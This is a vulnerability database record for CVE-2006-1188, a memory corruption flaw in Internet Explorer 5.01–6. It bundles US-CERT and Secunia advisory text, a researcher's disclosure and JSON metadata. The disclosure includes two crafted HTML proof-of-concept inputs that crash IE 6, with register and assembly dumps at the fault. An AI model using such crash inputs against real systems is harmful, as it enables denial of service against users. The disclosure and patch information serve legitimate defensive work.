var-200604-0201
Vulnerability from variot

Microsoft Internet Explorer 5.01 through 6 allows remote attackers to execute arbitrary code via HTML elements with a certain crafted tag, which leads to memory corruption. ------------ This vulnerability information is a summary of multiple vulnerabilities released at the same time. Please note that the contents of vulnerability information other than the title are included. Microsoft Windows fails to properly handle COM Objects. This vulnerability may allow a remote unauthenticated attacker to execute arbitrary code on a vulnerable system. Microsoft Internet Explorer (IE) will attempt to use COM objects that were not intended to be used in the web browser. This can cause a variety of impacts, such as causing IE to crash. This is related to the handling of certain HTML tags. They could also use HTML email for the attack. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

                    National Cyber Alert System

            Technical Cyber Security Alert TA06-101A

Microsoft Windows and Internet Explorer Vulnerabilities

Original release date: April 11, 2006 Last revised: -- Source: US-CERT

Systems Affected

 * Microsoft Windows
 * Microsoft Internet Explorer

For more complete information, refer to the Microsoft Security Bulletin Summary for April 2006.

I. (CVE-2006-0012)

II. If the user is logged on with administrative privileges, the attacker could take complete control of an affected system. An attacker may also be able to cause a denial of service.

III. Solution

Apply Updates

Microsoft has provided updates for these vulnerabilities in the Security Bulletins and on the Microsoft Update site.

Workarounds

Please see the US-CERT Vulnerability Notes for workarounds. Many of these vulnerabilities can be mitigated by following the instructions listed in the Securing Your Web Browser document.

Appendix A. Please send email to cert@cert.org with "TA06-101A Feedback VU#876678" in the subject.

For instructions on subscribing to or unsubscribing from this mailing list, visit http://www.us-cert.gov/cas/signup.html.

Produced 2006 by US-CERT, a government organization.

Terms of use:

 <http://www.us-cert.gov/legal.html>

Revision History

Apr 11, 2006: Initial release

-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux)

iQEVAwUBRDwj9n0pj593lg50AQInJggAoOBNa20SU8JukBoK5elr5vWOLcAjycHt Cg0+064ncCpQXoWiYPrLGVzg4/MCTVUygbYl85cePp5cHSHqpfuYXoBuZwSKu36+ olQdkbU1ejViA8A0XPsQ3EgtIRlDZSgL1ncYlRM8QxK8CF7QV616ta8q6H/3EDMM i+tXy6gzQMqJeUthopzGcfpf6U5Qu9PCk/+Pj66GfFhHpARanLef2H28WFRazC+I R+vLGLFLV0gp1Iy7t267l1BhN1w1z+fXD0WwYkiTwb0mzeize8Amdqlb5c4Vn4wh HAF/XGiCe5qkMhM7kRLA70JsNfSkI38JPHWSo9/a04wFBKENCAwNpA== =w6IC -----END PGP SIGNATURE----- .

Bist Du interessiert an einem neuen Job in IT-Sicherheit?

Secunia hat zwei freie Stellen als Junior und Senior Spezialist in IT- Sicherheit: http://secunia.com/secunia_vacancies/

TITLE: Internet Explorer "javaprxy.dll" Memory Corruption Vulnerability

SECUNIA ADVISORY ID: SA15891

VERIFY ADVISORY: http://secunia.com/advisories/15891/

CRITICAL: Highly critical

IMPACT: DoS, System access

WHERE:

From remote

SOFTWARE: Microsoft Internet Explorer 6.x http://secunia.com/product/11/ Microsoft Internet Explorer 5.5 http://secunia.com/product/10/ Microsoft Internet Explorer 5.01 http://secunia.com/product/9/

DESCRIPTION: SEC Consult has reported a vulnerability in Microsoft Internet Explorer, which potentially can be exploited by malicious people to compromise a user's system. This can be exploited via a malicious web site to cause a memory corruption.

The vulnerability has been reported in versions 5.01, 5.5, and 6.0.

SOLUTION: The vendor recommends setting Internet and Local intranet security zone settings to "High".

PROVIDED AND/OR DISCOVERED BY: sk0L and Martin Eiszner, SEC Consult.

ORIGINAL ADVISORY: Microsoft: http://www.microsoft.com/technet/security/advisory/903144.mspx

SEC Consult: http://www.sec-consult.com/184.html

About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.

Subscribe: http://secunia.com/secunia_security_advisories/

Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/

Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.

Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org

.

Visit http://www.microsoft.com/windows/ie/default.mspx or http://en.wikipedia.org/wiki/Internet_Explorer for detailed information.

o Memory Corruption Vulnerability: #7d519030

Following HTML code forces IE 6 to crash:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



    </h6 </ul

Online-demo: http://morph3us.org/security/pen-testing/msie/ie60-1135035582812-7d519030.html

These are the register values and the ASM dump at the time of the access violation:

eax=00000000 ebx=0012e88c ecx=00000000 edx=0012e7c0 esi=00000000 edi=00000004 eip=7d519030 esp=0012e780 ebp=0012e894

    7d519012 55               push    ebp
    7d519013 8bec             mov     ebp,esp
    7d519015 8b4104           mov     eax,[ecx+0x4]
    7d519018 394508           cmp     [ebp+0x8],eax
    7d51901b 7c09             jl      mshtml+0x69026 (7d519026)
    7d51901d 7edc             jle     mshtml+0x68ffb (7d518ffb)
    7d51901f 33c0             xor     eax,eax
    7d519021 40               inc     eax
    7d519022 5d               pop     ebp
    7d519023 c20800           ret     0x8
    7d519026 83c8ff           or      eax,0xffffffff
    7d519029 ebf7             jmp     mshtml+0x69022 (7d519022)
    7d51902b 90               nop
    7d51902c 90               nop
    7d51902d 90               nop
    7d51902e 90               nop
    7d51902f 90               nop

FAULT ->7d519030 8b4108 mov eax,[ecx+0x8] ds:0023:00000008=???????? 7d519033 85c0 test eax,eax 7d519035 7425 jz mshtml+0x6905c (7d51905c) 7d519037 8b10 mov edx,[eax] 7d519039 f6c210 test dl,0x10 7d51903c 7408 jz mshtml+0x69046 (7d519046) 7d51903e f6c220 test dl,0x20 7d519041 7519 jnz mshtml+0x6905c (7d51905c) 7d519043 8b400c mov eax,[eax+0xc] 7d519046 8b4808 mov ecx,[eax+0x8] 7d519049 85c9 test ecx,ecx

o Memory Corruption Vulnerability: #7d529d35

Following HTML code forces IE 6 to crash:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

</code

</style </td </label </bdo </th </object

Online-demo: http://morph3us.org/security/pen-testing/msie/ie60-1135042070015-7d529d35.html

These are the register values and the ASM dump at the time of the access violation:

eax=00000000 ebx=0012e88c ecx=00000000 edx=00000012 esi=00e7dbb0 edi=00000002 eip=7d529d35 esp=0012e778 ebp=0012e778

    7d529d0e e811170000       call    mshtml+0x7b424 (7d52b424)
    7d529d13 85c0             test    eax,eax
    7d529d15 0f85c5500800     jne     mshtml!DllGetClassObject+0x10fa2
                                      (7d5aede0)
    7d529d1b 0fb65508         movzx   edx,byte ptr [ebp+0x8]
    7d529d1f 8d849680000000   lea     eax,[esi+edx*4+0x80]
    7d529d26 5e               pop     esi
    7d529d27 5d               pop     ebp
    7d529d28 c20c00           ret     0xc
    7d529d2b 90               nop
    7d529d2c 90               nop
    7d529d2d 90               nop
    7d529d2e 90               nop
    7d529d2f 90               nop
    7d529d30 8bff             mov     edi,edi
    7d529d32 55               push    ebp
    7d529d33 8bec             mov     ebp,esp

FAULT ->7d529d35 0fbe4114 movsx eax,byte ptr [ecx+0x14] ds:0023:00000014=?? 7d529d39 c1e004 shl eax,0x4 7d529d3c 0578aa4b7d add eax,0x7d4baa78 7d529d41 7410 jz mshtml+0x79d53 (7d529d53) 7d529d43 8b400c mov eax,[eax+0xc] 7d529d46 234508 and eax,[ebp+0x8] 7d529d49 f7d8 neg eax 7d529d4b 1bc0 sbb eax,eax 7d529d4d f7d8 neg eax 7d529d4f 5d pop ebp 7d529d50 c20400 ret 0x4 7d529d53 33c0 xor eax,eax 7d529d55 ebf8 jmp mshtml+0x79d4f (7d529d4f)

o Vulnerable versions:

The DoS vulnerability was successfully tested on:

MS IE 6 SP2 - Win XP Pro SP2 MS IE 6 - Win 2k SP4

o Disclosure Timeline:

xx Feb 06 - Vulnerabilities discovered. 08 Mar 06 - Vendor contacted. 22 Mar 06 - Vendor confirmed vulnerabilities. 25 May 06 - Public release.

o Solution:

Install the latest security update (MS06-013) for Internet Explorer [2].

o Credits:

Thomas Waldegger bugtraq@morph3us.org BuHa-Security Community - http://buha.info/board/

If you have questions, suggestions or criticism about the advisory feel free to send me a mail. The address 'bugtraq@morph3us.org' is more a spam address than a regular mail address therefore it's possible that some mails get ignored. Please use the contact details at http://morph3us.org/ to contact me.

Greets fly out to cyrus-tc, destructor, nait, rhy, trappy and all members of BuHa

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-200604-0201",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": null,
        "scope": null,
        "trust": 7.2,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "internet explorer",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "microsoft",
        "version": "6.0"
      },
      {
        "model": "ie",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "5.2.3"
      },
      {
        "model": "internet explorer",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "5.1"
      },
      {
        "model": "internet explorer",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "5.5"
      },
      {
        "model": "internet explorer",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "6.0.2800.1106"
      },
      {
        "model": "ie",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "6"
      },
      {
        "model": "internet explorer",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "6.0.2600"
      },
      {
        "model": "internet explorer",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "6.0.2900.2180"
      },
      {
        "model": "ie",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "6.0"
      },
      {
        "model": "ie",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "5.1"
      },
      {
        "model": "internet explorer",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "6.0.2800"
      },
      {
        "model": "internet explorer",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "6"
      },
      {
        "model": "network camera server vb101",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canon",
        "version": "*"
      },
      {
        "model": "windows server 2003",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "microsoft",
        "version": "none"
      },
      {
        "model": "windows server 2003",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "microsoft",
        "version": "(itanium)"
      },
      {
        "model": "windows server 2003",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "microsoft",
        "version": "(x64)"
      },
      {
        "model": "windows xp",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "microsoft",
        "version": "(x64)"
      },
      {
        "model": "windows xp",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "microsoft",
        "version": "sp3"
      },
      {
        "model": "ie",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "6.0.2800.1106"
      },
      {
        "model": "ie",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "6.0.2900.2180"
      },
      {
        "model": "ie",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "microsoft",
        "version": "6.0.2800"
      },
      {
        "model": "internet explorer sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "6.0"
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#234812"
      },
      {
        "db": "CERT/CC",
        "id": "VU#876678"
      },
      {
        "db": "CERT/CC",
        "id": "VU#680526"
      },
      {
        "db": "CERT/CC",
        "id": "VU#824324"
      },
      {
        "db": "CERT/CC",
        "id": "VU#641460"
      },
      {
        "db": "CERT/CC",
        "id": "VU#341028"
      },
      {
        "db": "CERT/CC",
        "id": "VU#434641"
      },
      {
        "db": "CERT/CC",
        "id": "VU#740372"
      },
      {
        "db": "CERT/CC",
        "id": "VU#939605"
      },
      {
        "db": "BID",
        "id": "17468"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2006-000174"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200604-164"
      },
      {
        "db": "NVD",
        "id": "CVE-2006-1188"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "cpe_match": [
              {
                "cpe22Uri": "cpe:/o:microsoft:windows_server_2003",
                "vulnerable": true
              },
              {
                "cpe22Uri": "cpe:/o:microsoft:windows_xp",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2006-000174"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Thomas Waldegger\u203b bugtraq@morph3us.org",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200604-164"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2006-1188",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CVE-2006-1188",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "HIGH",
            "trust": 1.8,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "VHN-17296",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2006-1188",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "CARNEGIE MELLON",
            "id": "VU#876678",
            "trust": 0.8,
            "value": "35.63"
          },
          {
            "author": "CARNEGIE MELLON",
            "id": "VU#680526",
            "trust": 0.8,
            "value": "28.35"
          },
          {
            "author": "CARNEGIE MELLON",
            "id": "VU#984473",
            "trust": 0.8,
            "value": "23.01"
          },
          {
            "author": "CARNEGIE MELLON",
            "id": "VU#824324",
            "trust": 0.8,
            "value": "13.77"
          },
          {
            "author": "CARNEGIE MELLON",
            "id": "VU#641460",
            "trust": 0.8,
            "value": "27.00"
          },
          {
            "author": "CARNEGIE MELLON",
            "id": "VU#341028",
            "trust": 0.8,
            "value": "32.40"
          },
          {
            "author": "CARNEGIE MELLON",
            "id": "VU#434641",
            "trust": 0.8,
            "value": "25.50"
          },
          {
            "author": "CARNEGIE MELLON",
            "id": "VU#740372",
            "trust": 0.8,
            "value": "10.13"
          },
          {
            "author": "CARNEGIE MELLON",
            "id": "VU#939605",
            "trust": 0.8,
            "value": "44.55"
          },
          {
            "author": "NVD",
            "id": "CVE-2006-1188",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-200604-164",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-17296",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#876678"
      },
      {
        "db": "CERT/CC",
        "id": "VU#680526"
      },
      {
        "db": "CERT/CC",
        "id": "VU#984473"
      },
      {
        "db": "CERT/CC",
        "id": "VU#824324"
      },
      {
        "db": "CERT/CC",
        "id": "VU#641460"
      },
      {
        "db": "CERT/CC",
        "id": "VU#341028"
      },
      {
        "db": "CERT/CC",
        "id": "VU#434641"
      },
      {
        "db": "CERT/CC",
        "id": "VU#740372"
      },
      {
        "db": "CERT/CC",
        "id": "VU#939605"
      },
      {
        "db": "VULHUB",
        "id": "VHN-17296"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2006-000174"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200604-164"
      },
      {
        "db": "NVD",
        "id": "CVE-2006-1188"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Microsoft Internet Explorer 5.01 through 6 allows remote attackers to execute arbitrary code via HTML elements with a certain crafted tag, which leads to memory corruption. ------------ This vulnerability information is a summary of multiple vulnerabilities released at the same time. Please note that the contents of vulnerability information other than the title are included. Microsoft Windows fails to properly handle COM Objects. This vulnerability may allow a remote unauthenticated attacker to execute arbitrary code on a vulnerable system. Microsoft Internet Explorer (IE)  will attempt to use COM objects that were not intended to be used in the web browser.  This can cause a variety of impacts, such as causing IE to crash. This is related to the handling of certain HTML tags. They could also use HTML email for the attack. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n\n\n                        National Cyber Alert System\n\n                Technical Cyber Security Alert TA06-101A\n\n\nMicrosoft Windows and Internet Explorer Vulnerabilities\n\n   Original release date: April 11, 2006\n   Last revised: --\n   Source: US-CERT\n\n\nSystems Affected\n\n     * Microsoft Windows\n     * Microsoft Internet Explorer\n\n   For more complete information, refer to the Microsoft Security\n   Bulletin Summary for April 2006. \n\n\nI. \n   (CVE-2006-0012)\n\n\nII. If the user is logged on with\n   administrative privileges, the attacker could take complete control of\n   an affected system. An attacker may also be able to cause a denial of\n   service. \n\n\nIII. Solution\n\nApply Updates\n\n   Microsoft has provided updates for these vulnerabilities in the\n   Security Bulletins and on the Microsoft Update site. \n\nWorkarounds\n\n   Please see the US-CERT Vulnerability Notes for workarounds. Many of\n   these vulnerabilities can be mitigated by following the instructions\n   listed in the Securing Your Web Browser document. \n\nAppendix A. Please send\n   email to \u003ccert@cert.org\u003e with \"TA06-101A Feedback VU#876678\" in the\n   subject. \n ____________________________________________________________________\n\n   For instructions on subscribing to or unsubscribing from this\n   mailing list, visit \u003chttp://www.us-cert.gov/cas/signup.html\u003e. \n ____________________________________________________________________\n\n   Produced 2006 by US-CERT, a government organization. \n\n   Terms of use:\n\n     \u003chttp://www.us-cert.gov/legal.html\u003e\n ____________________________________________________________________\n\n\nRevision History\n\n   Apr 11, 2006: Initial release\n\n\n\n\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.2.1 (GNU/Linux)\n\niQEVAwUBRDwj9n0pj593lg50AQInJggAoOBNa20SU8JukBoK5elr5vWOLcAjycHt\nCg0+064ncCpQXoWiYPrLGVzg4/MCTVUygbYl85cePp5cHSHqpfuYXoBuZwSKu36+\nolQdkbU1ejViA8A0XPsQ3EgtIRlDZSgL1ncYlRM8QxK8CF7QV616ta8q6H/3EDMM\ni+tXy6gzQMqJeUthopzGcfpf6U5Qu9PCk/+Pj66GfFhHpARanLef2H28WFRazC+I\nR+vLGLFLV0gp1Iy7t267l1BhN1w1z+fXD0WwYkiTwb0mzeize8Amdqlb5c4Vn4wh\nHAF/XGiCe5qkMhM7kRLA70JsNfSkI38JPHWSo9/a04wFBKENCAwNpA==\n=w6IC\n-----END PGP SIGNATURE-----\n. \n\n----------------------------------------------------------------------\n\nBist Du interessiert an einem neuen Job in IT-Sicherheit?\n\n\nSecunia hat zwei freie Stellen als Junior und Senior Spezialist in IT-\nSicherheit:\nhttp://secunia.com/secunia_vacancies/\n\n----------------------------------------------------------------------\n\nTITLE:\nInternet Explorer \"javaprxy.dll\" Memory Corruption Vulnerability\n\nSECUNIA ADVISORY ID:\nSA15891\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/15891/\n\nCRITICAL:\nHighly critical\n\nIMPACT:\nDoS, System access\n\nWHERE:\n\u003eFrom remote\n\nSOFTWARE:\nMicrosoft Internet Explorer 6.x\nhttp://secunia.com/product/11/\nMicrosoft Internet Explorer 5.5\nhttp://secunia.com/product/10/\nMicrosoft Internet Explorer 5.01\nhttp://secunia.com/product/9/\n\nDESCRIPTION:\nSEC Consult has reported a vulnerability in Microsoft Internet\nExplorer, which potentially can be exploited by malicious people to\ncompromise a user\u0027s system. \nThis can be exploited via a malicious web site to cause a memory\ncorruption. \n\nThe vulnerability has been reported in versions 5.01, 5.5, and 6.0. \n\nSOLUTION:\nThe vendor recommends setting Internet and Local intranet security\nzone settings to \"High\". \n\nPROVIDED AND/OR DISCOVERED BY:\nsk0L and Martin Eiszner, SEC Consult. \n\nORIGINAL ADVISORY:\nMicrosoft:\nhttp://www.microsoft.com/technet/security/advisory/903144.mspx\n\nSEC Consult:\nhttp://www.sec-consult.com/184.html\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. \n\nVisit http://www.microsoft.com/windows/ie/default.mspx or\nhttp://en.wikipedia.org/wiki/Internet_Explorer for detailed information. \n\no Memory Corruption Vulnerability: \u003cmshtml.dll\u003e#7d519030\n=================================\n\nFollowing HTML code forces IE 6 to crash:\n\u003e \u003c!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\"\n\u003e      \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\"\u003e\n\u003e \u003chtml\u003e  \u003cfieldset\u003e    \u003ch4\u003e\n\u003e \u003cpre\u003e\u003ctd\u003e\n\u003e \u003cmenu\u003e\n\u003e \u003clegend\u003e\n\u003e \u003ca\u003e\n\u003e \u003cul\u003e\n\u003e \u003csmall\u003e\n\u003e \u003cfieldset\u003e\n\u003e \u003ch6\u003e\n\u003e \u003c/h6\n\u003e \u003c/u\u003e\n\u003e \u003c/optgroup\u003e\n\u003e \u003c/tr\u003e\n\u003e \u003c/map\u003e\n\u003e \u003c/ul\n\u003e \u003c/dfn\u003e\n\u003e\n\u003e \u003c/del\u003e\n\u003e \u003c/h2\u003e\n\u003e \u003c/dir\u003e\n\u003e \u003c/ul\u003e\n\nOnline-demo:\nhttp://morph3us.org/security/pen-testing/msie/ie60-1135035582812-7d519030.html\n\nThese are the register values and the ASM dump at the time of the access\nviolation:\n\u003e eax=00000000 ebx=0012e88c ecx=00000000 edx=0012e7c0 esi=00000000\n\u003e edi=00000004 eip=7d519030 esp=0012e780 ebp=0012e894\n\u003e\n\u003e         7d519012 55               push    ebp\n\u003e         7d519013 8bec             mov     ebp,esp\n\u003e         7d519015 8b4104           mov     eax,[ecx+0x4]\n\u003e         7d519018 394508           cmp     [ebp+0x8],eax\n\u003e         7d51901b 7c09             jl      mshtml+0x69026 (7d519026)\n\u003e         7d51901d 7edc             jle     mshtml+0x68ffb (7d518ffb)\n\u003e         7d51901f 33c0             xor     eax,eax\n\u003e         7d519021 40               inc     eax\n\u003e         7d519022 5d               pop     ebp\n\u003e         7d519023 c20800           ret     0x8\n\u003e         7d519026 83c8ff           or      eax,0xffffffff\n\u003e         7d519029 ebf7             jmp     mshtml+0x69022 (7d519022)\n\u003e         7d51902b 90               nop\n\u003e         7d51902c 90               nop\n\u003e         7d51902d 90               nop\n\u003e         7d51902e 90               nop\n\u003e         7d51902f 90               nop\n\u003e FAULT -\u003e7d519030 8b4108           mov     eax,[ecx+0x8]\n\u003e                                           ds:0023:00000008=????????\n\u003e         7d519033 85c0             test    eax,eax\n\u003e         7d519035 7425             jz      mshtml+0x6905c (7d51905c)\n\u003e         7d519037 8b10             mov     edx,[eax]\n\u003e         7d519039 f6c210           test    dl,0x10\n\u003e         7d51903c 7408             jz      mshtml+0x69046 (7d519046)\n\u003e         7d51903e f6c220           test    dl,0x20\n\u003e         7d519041 7519             jnz     mshtml+0x6905c (7d51905c)\n\u003e         7d519043 8b400c           mov     eax,[eax+0xc]\n\u003e         7d519046 8b4808           mov     ecx,[eax+0x8]\n\u003e         7d519049 85c9             test    ecx,ecx\n\no Memory Corruption Vulnerability: \u003cmshtml.dll\u003e#7d529d35\n=================================\n\nFollowing HTML code forces IE 6 to crash:\n\u003e \u003c!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\"\n\u003e \"http://www.w3.org/TR/html4/loose.dtd\"\u003e\n\u003e \u003cbdo\u003e\n\u003e     \u003c/span\u003e\n\u003e \u003cpre\u003e\n\u003e\n\u003e \u003cparam\u003e\n\u003e \u003cform\u003e\n\u003e \u003ccolgroup\u003e\n\u003e \u003csmall\u003e\n\u003e \u003c/small\u003e\n\u003e \u003c/colgroup\u003e\n\u003e \u003c/map\u003e\n\u003e \u003c/button\u003e\n\u003e \u003c/code\n\u003e\n\u003e \u003cblockquote\u003e\n\u003e \u003cth\u003e\n\u003e \u003csmall\u003e\n\u003e\n\u003e \u003c/tbody\u003e\n\u003e \u003c/tr\u003e\n\u003e \u003c/ol\u003e\n\u003e \u003c/tbody\u003e\n\u003e \u003c/ol\u003e\n\u003e \u003c/code\u003e\n\u003e \u003c/strong\u003e\n\u003e\n\u003e\n\u003e \u003chead\u003e\n\u003e \u003cfieldset\u003e\n\u003e \u003cstyle\u003e\n\u003e\n\u003e \u003c/style\n\u003e \u003c/dir\u003e\n\u003e \u003c/a\u003e\n\u003e \u003c/td\n\u003e \u003c/li\u003e\n\u003e \u003c/label\n\u003e \u003c/object\u003e\n\u003e \u003c/bdo\n\u003e \u003c/th\n\u003e \u003c/object\n\u003e \u003c/q\u003e\n\u003e\n\u003e \u003col\u003e\n\u003e \u003cobject\u003e\n\nOnline-demo:\nhttp://morph3us.org/security/pen-testing/msie/ie60-1135042070015-7d529d35.html\n\nThese are the register values and the ASM dump at the time of the access\nviolation:\n\u003e eax=00000000 ebx=0012e88c ecx=00000000 edx=00000012 esi=00e7dbb0\n\u003e edi=00000002 eip=7d529d35 esp=0012e778 ebp=0012e778\n\u003e\n\u003e         7d529d0e e811170000       call    mshtml+0x7b424 (7d52b424)\n\u003e         7d529d13 85c0             test    eax,eax\n\u003e         7d529d15 0f85c5500800     jne     mshtml!DllGetClassObject+0x10fa2\n\u003e                                           (7d5aede0)\n\u003e         7d529d1b 